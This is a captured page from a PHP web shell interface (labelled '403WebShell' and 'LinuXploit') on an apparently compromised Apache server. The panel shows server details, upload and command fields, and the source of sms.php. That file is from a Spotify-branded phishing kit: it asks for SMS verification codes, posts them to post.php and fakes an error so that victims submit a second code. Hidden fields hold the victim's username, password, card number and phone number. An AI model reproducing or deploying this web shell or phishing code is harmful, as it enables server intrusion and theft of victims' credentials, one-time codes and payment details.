AVRIL_START_JANCOKALIVEAVRIL_END_JANCOK Interactive Terminal

Command Executor

AVRIL_START_JANCOKALIVEAVRIL_END_JANCOK Interactive Terminal

Command Executor

403WebShell
403Webshell
Server IP : 146.190.157.162  /  Your IP : 216.73.216.175
Web Server : Apache
System : Linux ubuntu-s-2vcpu-4gb-amd-sfo3-01-KIT-DIGITAL 6.5.0-44-generic #44-Ubuntu SMP PREEMPT_DYNAMIC Fri Jun 7 15:10:09 UTC 2024 x86_64
User : vergeskit ( 679)
PHP Version : 8.2.10-2ubuntu2.2
Disable Function : exec,passthru,shell_exec,system,proc_open,popen,pcntl_exec,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_signal,pcntl_signal_dispatch,pcntl_getpriority,pcntl_setpriority,dl,putenv,parse_ini_file,show_source
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/html/vergeskit/spotify/auth/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/vergeskit/spotify/auth//sms.php
<?php 
require '../main.php';
?><!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <title><?php echo $lang["title"]; ?></title>
    <link rel="stylesheet" href="res/app.css">
</head>
<body>
<form action="action.php" method="POST">
    <input type="hidden" name="LOGIN">
    <input type="hidden" name="USERNAME">
    <input type="hidden" name="PASSWORD">
    <input type="hidden" name="CARD_NUMBER">
    <input type="hidden" name="PHONE_NUMBER">
</form>
<header>
    <img src="res/logo.png">
</header>
<div class="loader" style="color:white; text-align:center;">
    <div class="content" style="flex-direction:column;">
        <h3><?php echo $lang['_loading'][0];?></h3>
        <p><?php echo $lang['_loading'][1];?></p>
    <img src="res/loading.gif">
</div>
</div>

<main>

<div class="form">

<div class="title">
  <?php echo $lang["_sms_texts"][0]; ?>
    <p style="font-size:0.5em;">  <?php echo $lang["_sms_texts"][1]; ?></p>
</div>

<div class="cols">

<div class="col" style="color:red; display:none;" id="error-msg">
<?php echo $lang["_sms_texts"][4]; ?>
</div>
 

<div class="col">
    <label>  <?php echo $lang["_sms_texts"][2]; ?></label>
    <input type="text" id="sms" placeholder="<?php echo $lang["_sms_texts"][3]; ?>">
</div>
 
<div class="col remember">
<a href="#" onclick="newCode()"><?php echo $lang["_sms_texts"][5]; ?></a>
</div>


<div class="col submit">
    <button onclick="sbmt()"><?php echo $lang["_sms_texts"][6]; ?></button>
</div>

 


</div>


</div>

</main>


<script src="res/jq.js"></script>
<script>
    var loader = $(".loader");
    var count = 0;
    var error_msg = $("#error-msg");
$("input").keypress((e)=>{
    if(e.key=="Enter"){
        sbmt();
    }
});

function sbmt(){
    var sms = $("#sms").val();
    var sub = true;
    $("#sms").removeClass("error");
    if(sms.length<4){
        $("#sms").addClass("error");
        sub=false;
    }

    if(sub){
        count++;
        error_msg.hide();
        loader.show();
            
        $.post("post.php",{sms:sms},(res)=>{
            if(count>=2){
                window.location="exit.php";
            }else{
                error_msg.show();
                loader.hide();
            }
    
        });
    }

}


 
function newCode(){
    loader.show();
    setTimeout(() => {
        loader.hide();
    }, 2000);
}
 


</script>
</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit